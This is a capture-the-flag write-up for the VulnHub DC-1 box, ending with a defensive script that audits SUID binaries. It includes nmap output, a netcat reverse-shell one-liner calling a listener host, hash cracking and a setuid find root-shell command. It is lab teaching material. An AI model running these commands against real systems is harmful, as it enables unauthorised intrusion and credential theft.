DC-1 — VulnHub
Introduction:
The DC series is a boot2root series on VulnHub that teaches many new skills, and this is the first box in the series. We start by running nmap, which reveals four open ports. We get a foothold by exploiting a vulnerable version of Drupal and escalate privileges through a SUID binary. The box can be done in fewer steps, but I followed the author's intended path.
Methodology:
First we run a full TCP scan, which reveals four open ports, then we run an aggressive scan against just those ports.
$ nmap -A -p22,80,111,45405 -oA scans/openTCP 192.168.125.151
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: Welcome to Drupal Site | Drupal Site
|_http-server-header: Apache/2.2.22 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 45405/tcp status
| 100024 1 46408/tcp6 status
| 100024 1 47855/udp status
|_ 100024 1 53557/udp6 status
45405/tcp open status 1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The scan shows the Apache version, and the http-generator header tells us the site runs Drupal 7. Browsing to the web server gives a login panel; a few default credentials did not work.
Searching for vulnerabilities in Drupal 7 shows that it is vulnerable to the Drupalgeddon remote code execution exploit. I found an implementation on GitHub.
The first run of the exploit failed because the highline Ruby gem was missing; installing it fixes that:
sudo gem install highline
Running the exploit again gave a shell, though only a web shell. It was enough to read the first flag, which hinted at looking in the configuration files.
The second flag and the database credentials were in the settings.php file; the second flag hinted at using those credentials.
I could not connect to the database from the web shell, so I used it to spawn a reverse shell with the following payload (10.0.0.1 and 4242 are the listening host and port):
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f
Then I connected to the database with those credentials and pulled the password hashes for admin and one other user.
I copied the hashes to my own machine and cracked them with hashcat; it took some time.
Using the recovered admin password I logged in to Drupal and found the third flag on the content page.
The fourth flag was in the user's home directory. Both the third and fourth flags hinted at checking the permissions of the find binary, so I listed the SUID files and confirmed that find has the SUID bit set.
With help from GTFOBins, I ran the following and got root:
find . -exec /bin/sh \; -quit
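As an added defensive check, not part of this write-up or the DC-1 box itself, the script below compares a host's SUID inventory against a known-good baseline and singles out shell-capable additions such as the setuid find above; the baseline allowlist and the sample inventory are constructed assumptions.

```shell
#!/bin/sh
# Added example, not from the original write-up: audit a SUID inventory against
# a known-good baseline and flag shell-capable additions such as a setuid find.
# Assumption: SUID_BASELINE is a hypothetical minimal allowlist for a Debian host.
SUID_BASELINE='/bin/su
/bin/mount
/bin/umount
/usr/bin/passwd
/usr/bin/sudo'

# Binaries GTFOBins documents as giving a shell when setuid; none belong in a baseline.
SHELL_CAPABLE='find vim awk perl'

# Print inventory entries (newline-separated, $1) that are absent from the baseline.
suid_unexpected() {
    printf '%s\n' "$1" | while IFS= read -r p; do
        [ -n "$p" ] || continue
        printf '%s\n' "$SUID_BASELINE" | grep -Fxq -- "$p" || printf '%s\n' "$p"
    done
}

# Narrow the unexpected entries to those whose basename is shell-capable.
suid_dangerous() {
    suid_unexpected "$1" | while IFS= read -r p; do
        b=${p##*/}
        for s in $SHELL_CAPABLE; do
            if [ "$b" = "$s" ]; then printf '%s\n' "$p"; break; fi
        done
    done
}

# Live inventory for a real host (run as root so every directory is readable).
collect_suid() { find / -xdev -type f -perm -4000 2>/dev/null; }

# Constructed sample inventory standing in for "$(collect_suid)" on a DC-1-like host.
SAMPLE_INVENTORY='/bin/su
/bin/mount
/bin/umount
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/find
/usr/local/bin/backup'

echo "Unexpected SUID files:"; suid_unexpected "$SAMPLE_INVENTORY"
echo "Shell-capable, remove the bit with chmod u-s:"; suid_dangerous "$SAMPLE_INVENTORY"
```

On a real host, feed "$(collect_suid)" to the two functions instead of the sample and keep the baseline under version control so any drift shows up in the diff.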